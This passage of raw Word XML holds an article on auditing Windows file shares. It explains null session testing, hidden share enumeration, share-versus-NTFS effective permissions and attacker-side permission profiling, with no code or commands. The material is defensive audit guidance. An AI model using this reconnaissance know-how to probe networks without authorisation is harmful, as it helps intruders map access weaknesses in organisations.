          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nested Group Expansion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A share might be locked down to a single domain group, but that group inadvertently includes broader groups (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Domain Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), implicitly granting access to the entire organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561D9F3" w14:textId="5DCC9BDB" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implicit Trust and Lateral Movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers prioritize compromising departmental endpoints because they often house high-value targets (e.g., payroll data, source code, network diagrams).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200694BB" w14:textId="150359CE" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step-by-Step Technical Audit Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119D7CB" w14:textId="63885802" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An audit of these endpoints should be conducted to evaluate two key distinct parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9728C1" w14:textId="48B891F4" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Visibility – </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what can they see?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196AB071" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9234B4" w14:textId="12150891" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control – </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what can they do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434893DE" w14:textId="4CD66D55"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lastRenderedPageBreak/>
        <w:t>Phase A: Network Visibility and Null Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CA307" w14:textId="0B5FBA35" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The first step evaluates what an unauthenticated outsider can see on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B503F" w14:textId="37C2AF08" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Null Session Testing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> An auditor may attempt to establish a connection using no username and no password (</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> share access).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C9B7B" w14:textId="2A28433E" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Share Enumeration:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tools query the RPC (Remote Procedure Call) or NetBIOS interfaces of the endpoint to list all active share names, even if they are hidden (shares ending in </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E4780" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A77077" w14:textId="4000B50B" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Goal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zero visibility. A secure endpoint should reject anonymous queries completely, revealing no shared names or directory structures to unauthenticated entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65087830" w14:textId="2FC399FB"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Phase B: Access Parameter Mapping (ACL vs. NTFS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D2CB0" w14:textId="13D49957" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once an authenticated session has been established, the auditor will then evaluate the intersection between two distinct permission sets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491155ED" w14:textId="0EBE7134" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Share Permissions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The outermost gate. It controls access across the network topology (e.g., Read, Change, Full Control).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1059A" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7662BBC5" w14:textId="24277505" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTFS / ReFS Permissions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The local file system gate. It controls access to the folders and files on a hard drive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD5875" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEF174B" w14:textId="4784FF17" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Effective Permission:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows applies the most restrictive combination of the two. If a Share permission allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Full Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but the NTFS permission is set to </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only, the user will then only be able to read the files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE5FC2" w14:textId="30FB0E26" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows calculates Effective Permissions by aggregating multiple group memberships first, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">before </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comparing the gates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23A933" w14:textId="25D662B1" w:rsid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Accumulation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a user is in Group A (Read) and Group B (Change), their cumulative Share permission is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the least restrictive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the same gate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EE13B" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011492CC" w14:textId="7757C0E6" w:rsid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Explicit Deny:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> An explicit “Deny” rule on either gate overrides everything else instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428D0F46" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401D28D0" w14:textId="0176B868" w:rsidR="00442C76" w:rsidRP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The Final Intersection:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Only after calculating the totals for each gate does Windows apply the most restrictive rule between the Share total and the NTFS total.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0394C740" w14:textId="71323D76" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Security testing and attacking infrastructure are the same in-one as both are rarely just about finding a single software bug; it is about profiling organizational behaviors, and defenders and attackers do this through permissions profiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D379B" w14:textId="5F7FCDEB" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Defenders use tools (like PingCastle, BloodHound, or native PowerShell) to map out these permissions matrices. Identifying a lax permission scheme helps them to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B96BAD" w14:textId="3BB09C33" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">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Enforce the Principle of Least Privileges (PoLP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Move away from using </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Everyone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Authenticated Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the Share level, standardizing instead of specific Active Directory (AD) security groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435524B6" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F6EC87" w14:textId="0F5ECFC3" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">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Audit Inheritance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Find folders where local file system inheritance was broken, accidentally leaving sensitive data exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66777E" w14:textId="1ACF4779" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>From the attacker lens, adversarial profiling is done with the aid of harvested cyber threat intelligence on the targeted organization. This type of information an attacker routinely scouts for aids them in better being able to strategize their attack plans and objectives, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CAFD65" w14:textId="11CE625A" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">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 xml:space="preserve">Inferring IT Governance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If an attacker enumerates a network and finds that standard domain users have `Full Control over administrative shares, or that local workstation users have widespread local administrator rights, it signals a low-maturity security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C1F76" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
